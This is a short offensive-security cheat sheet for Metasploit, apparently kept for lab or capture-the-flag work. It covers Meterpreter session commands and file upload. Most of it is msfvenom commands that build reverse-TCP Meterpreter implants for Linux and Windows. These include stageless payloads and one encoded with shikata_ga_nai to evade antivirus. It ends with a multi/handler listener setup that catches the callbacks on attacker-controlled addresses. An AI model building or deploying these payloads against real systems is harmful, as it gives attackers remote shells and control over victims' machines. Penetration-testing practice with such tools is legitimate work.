###########################
### USAGE: SESSIONS ###
###########################
# meterpreter is used through "sessions" command
-l, --list # list sessions
-i, --interact $ID # enter interactive mode
-c, --command $CMD # run command on all sessions (or on specific session if --interact is specified)
-C # run meterpreter command (same as above)
##############################
### USAGE: METERPRETER ###
##############################
### GENERAL
shell # enter a standard shell
bg # bg the current session
jobs -l # list all running jobs
### FS
upload $SRC $DEST # upload a file (use tab to navigate)
###################
### REVERSE ###
###################
### payload/linux/x64/meterpreter/reverse_tcp (staged)
### payload/windows/x64/meterpreter/reverse_tcp (staged)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST='10.10.14.123' LPORT='9596' -f elf | base64 -w 0
# STAGED
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST='10.10.14.123' LPORT='9596' -f raw
# STAGELESS
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST='10.10.14.123' LPORT='9596' -f raw
# STAGELESS SGN
msfvenom -p windows/meterpreter_reverse_tcp EXITFUNC="thread" LHOST='192.168.68.1' LPORT='4444' -f raw --encoder x86/shikata_ga_nai -i 5 > implant.shc
### starting a listener
use multi/handler
# set payload windows/x64/meterpreter/reverse_tcp
set payload $PAYLOAD
setg smth $SMTH
set lhost $LHOST
set lport $LPORT
exploit -j